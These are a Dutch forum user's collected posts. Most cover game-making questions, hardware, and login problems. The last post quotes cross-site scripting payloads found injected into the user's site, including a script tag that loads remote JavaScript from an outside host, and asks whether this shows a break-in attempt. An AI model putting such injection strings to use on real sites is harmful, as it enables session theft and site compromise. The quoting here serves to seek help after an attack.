Is het mogelijk om zo een klein dingetje in php/html te doen?
Daarmee bedoel ik dat je in een mini map jezelf ziet en je kan je bewegen?
Posts by R.H user removed
-
-
Ja, weet wel dat je verschillende minecraft servers kan hebben.
cracked enzo..Maar zelf zo een game is dat alleen java? of kan je dit ook maken met andere talen?
-
Ik zou graag wat meer info willen over hoe ik een spel kan maken zoals MineCraft.
In welke talen kan je het allemaal maken?
...Het moet natuurlijk niet sprekent die game zijn,
Maar zo een beetje basis een wereld waar je kan rondlopen dingen in doen, en dat er vijanden zijn, ect -
Nou, ik weet alleszins mijn werkpunt!
Beveiliging! -
Gefeliciteerd en veel succes!
-
Als je bewijs naar mij kan sturen dat het goed is voor mijnmaffia ben ik geintreseerd!
-
@H.rayn ik ook ben erg nieuwsgierig ernaar
-
Hier kan een slotje op Luc heeft me hierbij geholpen!
:slotje:
-
Ik wist dat iemand het me gaf maar ik dacht dat het buffy was, of nog iemand anders,
@Ferhat kan je me die even opnieuw geven?
-
hier is wat ik bedoel:
https://dl.dropbox.com/u/80267510/captcha.bmp -
Starohosting ik had dit zelfde probleem.
Ik denk dat ik het heb kunnen fixen door de nieuwe versie van ebuddy te downloaden opWant vanaf ik dit deed kon ik weer inloggen op mijn msn.
Bij mij gebeurde namelijk dit
ik voerde alle gegevens op mijn msn goed in maar liet zien dat je inlogde daarna bleef die op inlog gedeelte staan met +- de helft van het wachtwoord -
Ik zal vanavond als ik weer thuis ben even in paint snel een voorbeeldje maken
-
Ik ga toch admin pass wijzigen want er stond nieuw bericht onder mijn naam dat ik niet plaatse
-
Is al een lange tijd gedelen
-
Ik had er vroeger eentje gekregen van iemand die werkte op de crimz source, en werkte met de zelfde afbeeldingen, ect
Helaas heb ik deze niet meer en weet ik ook niet meer wie het was die hem gaf
-
Dus er is niets aan de hand?
-
Oke, aangezien mijn budget rond de 400-450EUR is
-
met een dual core processor moet dat werken?
-
Het is natuurlijk niet zo erg omdat ik er niet veel mee wil doen maar dat was ik wel van plan het gaat namelijk over multihacks.be
-
Ik las dit net op een pagina van mijn site:
PHP<h1>N00B!!!!!</h1> 08-07-12 - 15:31 <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> 08-07-12 - 15:32 <script>evil_script()</script> 08-07-12 - 15:23 <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Wilt dit zeggen dat er iemand probeerde in te breken/heeft gedaan?
H.Rayn Let volgende keer gelieve op de titel!